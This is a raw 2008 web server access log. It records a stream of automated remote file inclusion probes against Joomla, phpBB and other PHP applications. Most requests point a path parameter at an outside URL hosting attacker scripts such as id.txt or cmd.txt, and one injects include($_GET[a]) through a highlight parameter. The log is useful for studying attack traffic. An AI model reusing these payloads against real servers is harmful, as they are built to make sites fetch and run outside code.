208.226.79.133 - - [06/May/2008:10:00:32 -0700] "GET /logs/main.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:00:32 -0700] "GET /main.php?x=http://www.dlkownz.com/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:00:37 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:00:37 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:00:37 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:00:37 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.23.222 - - [06/May/2008:10:00:40 -0700] "GET /logs/access_080216.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:10:00:53 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.115.110.64 - - [06/May/2008:10:00:58 -0700] "GET //account.php?action=http://eurojobmediator.org/eurojob3/language/.dat/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:10:01:11 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.9.163 - - [06/May/2008:10:01:22 -0700] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.arai.web.id/bleh/bot_site.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:01:53 -0700] "GET /logs//login.php?dir=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.245.149.155 - - [06/May/2008:10:01:53 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.71.28.84 - - [06/May/2008:10:01:54 -0700] "GET //login.php?dir=http://200.167.24.12/anatomia/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.245.149.155 - - [06/May/2008:10:01:59 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apnic.net/index.html? HTTP/1.0" 200 4123 "-" "Mozilla/5.0" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:10:02:05 -0700] "GET /logs/access_080215.log/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:10:02:05 -0700] "GET /voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
206.212.241.218 - - [06/May/2008:10:02:05 -0700] "GET /logs/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.70.125.187 - - [06/May/2008:10:02:23 -0700] "GET /logs/access_080225.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:02:27 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:02:27 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:02:27 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:02:27 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:02:27 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:02:27 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:02:32 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:02:32 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:02:32 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:02:32 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:02:32 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:02:32 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:02:33 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:02:33 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:02:33 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:02:33 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:02:33 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:02:33 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.38.12.93 - - [06/May/2008:10:02:36 -0700] "GET /main.php?pagina=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.61.90 - - [06/May/2008:10:02:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [06/May/2008:10:02:47 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.61.90 - - [06/May/2008:10:02:48 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.236.5.128 - - [06/May/2008:10:02:50 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:10:03:42 -0700] "GET /logs/access_080215.log/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:10:03:42 -0700] "GET /voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.255.44 - - [06/May/2008:10:03:42 -0700] "GET /logs/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:03:52 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.246.218.158 - - [06/May/2008:10:03:52 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:03:53 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.121.101.163 - - [06/May/2008:10:03:53 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:10:03:57 -0700] "GET ///squirrelcart/cart_content.php?cart_isp_root=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:10:04:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.33 - - [06/May/2008:10:04:01 -0700] "GET /index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.58.22 - - [06/May/2008:10:04:01 -0700] "GET //skin/zero_vote/error.php?dir=http://www.rehau-trocal.ru/alat/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.221.130.3 - - [06/May/2008:10:04:08 -0700] "GET /oneadmin/common/include.php?path[docroot]=http://finkels.fileave.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:04:12 -0700] "GET //login.php?dir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
85.25.145.85 - - [06/May/2008:10:04:17 -0700] "GET /logs//login.php?dir=http://www.i-promo.info/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:10:04:25 -0700] "GET //index2.php?option=com_joomlaboard&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
62.240.12.1 - - [06/May/2008:10:04:26 -0700] "GET /logs//index2.php?option=com_joomlaboard&Itemid=&mosConfig_absolute_path=http://www.tecnomusic.com.mx/v1/cache/mambo.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:04:29 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.179.98 - - [06/May/2008:10:04:29 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.241.215.166 - - [06/May/2008:10:04:53 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
212.241.215.166 - - [06/May/2008:10:04:54 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://thetestingcompany.com//cache/rotest.txt? HTTP/1.1" 200 50 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:10:05:00 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.180.16 - - [06/May/2008:10:05:06 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.88.4.5 - - [06/May/2008:10:05:11 -0700] "GET //squirrelcart/cart_content.php?cart_isp_root=http://www.villadolores.gov.ar/portal//images/data/shep?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:10:05:49 -0700] "GET /logs/main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:10:05:49 -0700] "GET /main.php?x=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:10:05:54 -0700] "GET /logs/index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.61.4 - - [06/May/2008:10:05:58 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.1250kcue.com/phpauction//themes/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.96.74 - - [06/May/2008:10:05:59 -0700] "GET /index.php?configFile=http://www.joostmulders.nl/language/kopler.cek?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:06:02 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:06:03 -0700] "GET //administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:06:03 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:06:20 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:06:46 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:06:46 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:06:46 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:06:50 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:10:06:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
79.188.9.222 - - [06/May/2008:10:06:54 -0700] "GET //skin/zero_vote/error.php?dir=ftp://128.175.10.3/incoming/smile04.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.245.149.155 - - [06/May/2008:10:07:12 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.245.149.155 - - [06/May/2008:10:07:19 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.apnic.net/index.html? HTTP/1.0" 200 4123 "-" "Mozilla/5.0" "www.dmulk.com"
142.150.1.9 - - [06/May/2008:10:07:20 -0700] "GET //login.php?dir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:10:07:59 -0700] "GET /logs/access_080218.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:10:07:59 -0700] "GET /administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:10:08:00 -0700] "GET /logs/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.61.90 - - [06/May/2008:10:08:20 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.cnm.gob.pe/cnm/cache/tmp0/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:10:08:55 -0700] "GET /logs/access_080215.log/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:10:09:00 -0700] "GET /voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:10:09:02 -0700] "GET /logs/access_080215.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:09:03 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [06/May/2008:10:09:04 -0700] "GET /logs/access_080324.log/homepage.php?sel=http://www.dlkownz.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.138.183 - - [06/May/2008:10:09:06 -0700] "GET /logs/voir.php?inc=http://allblackberry.com/install/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:10:09:20 -0700] "GET /logs/access_080111.log//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:10:09:20 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:10:09:20 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.207.204.13 - - [06/May/2008:10:09:20 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:09:45 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.192.68.59 - - [06/May/2008:10:09:45 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.patagones.net/html//administrator/components/com_joomla-visites/core/include/%20%20%20/sp.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.19.150.85 - - [06/May/2008:10:10:36 -0700] "GET /logs/access_080126.log/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
221.143.49.246 - - [06/May/2008:10:10:49 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [06/May/2008:10:10:49 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
221.143.49.246 - - [06/May/2008:10:10:49 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://xuxulio.iespana.es/outro.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:10:10:52 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:10:10:52 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:10:10:54 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.18.152.168 - - [06/May/2008:10:10:55 -0700] "GET /logs/access_080201.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://bubbleface.bu.funpic.de/help01.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.38.46.234 - - [06/May/2008:10:10:55 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.welkominfo.co.za/lapa/bo.do? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
193.251.177.175 - - [06/May/2008:10:11:18 -0700] "GET /logs/access_071225.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.251.177.175 - - [06/May/2008:10:11:18 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.251.177.175 - - [06/May/2008:10:11:19 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://veldega-tour.ru/.log/safe?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.70.125.187 - - [06/May/2008:10:11:23 -0700] "GET /logs/access_080311.log//oneadmin/calendar/samplecalendar.php?path[docroot]=http://www.ride2eat.com/calendar/albo/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
